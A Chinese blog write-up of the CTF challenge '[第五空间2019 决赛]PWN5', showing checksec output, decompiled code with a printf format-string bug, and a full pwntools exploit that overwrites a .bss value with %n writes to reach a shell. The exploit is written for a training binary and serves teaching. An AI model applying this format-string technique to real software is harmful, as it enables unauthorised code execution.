加载头像

[第五空间2019 决赛]PWN5

Ubuntu 18


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/[F Space 2019 sc]PWN5/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found //存在保护
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

encrypt()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
int __cdecl main(int a1)
{
unsigned int v1; // eax
int result; // eax
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF
char buf[100]; // [esp+14h] [ebp-70h] BYREF
unsigned int v6; // [esp+78h] [ebp-Ch]
int *v7; // [esp+7Ch] [ebp-8h]

v7 = &a1;
v6 = __readgsdword(0x14u);
setvbuf(stdout, 0, 2, 0);
v1 = time(0);
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &dword_804C044, 4u);
printf("your name:");
read(0, buf, 0x63u); //fmt string 向.bss写入字符串
printf("Hello,");
printf(buf);
printf("your passwd:");
read(0, nptr, 0xFu);
if ( atoi(nptr) == dword_804C044 ) //dword_804C044为产生的随机数
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
if ( __readgsdword(0x14u) != v6 )
sub_80493D0();
return result;
}

//0x0804C044

0x02


思路 fmt string

1.利用read()处向.bss0x0804C044 连续写入4个字节

​ 确定格式化字符串的位置 10

2.发送成功写入的字节数16 hex 0x10

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './pwn'
io = process([path])
# io = remote('node4.buuoj.cn', 26083)

bss_addr = 0x804c044
payload = p32(bss_addr) + p32(bss_addr+1) + p32(bss_addr+2) + p32(bss_addr+3)
payload += b'%10$n%11$n%12$n%13$n'

io.sendlineafter(b'e:', payload)
io.sendlineafter(b'd:', str(0x10101010))

io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體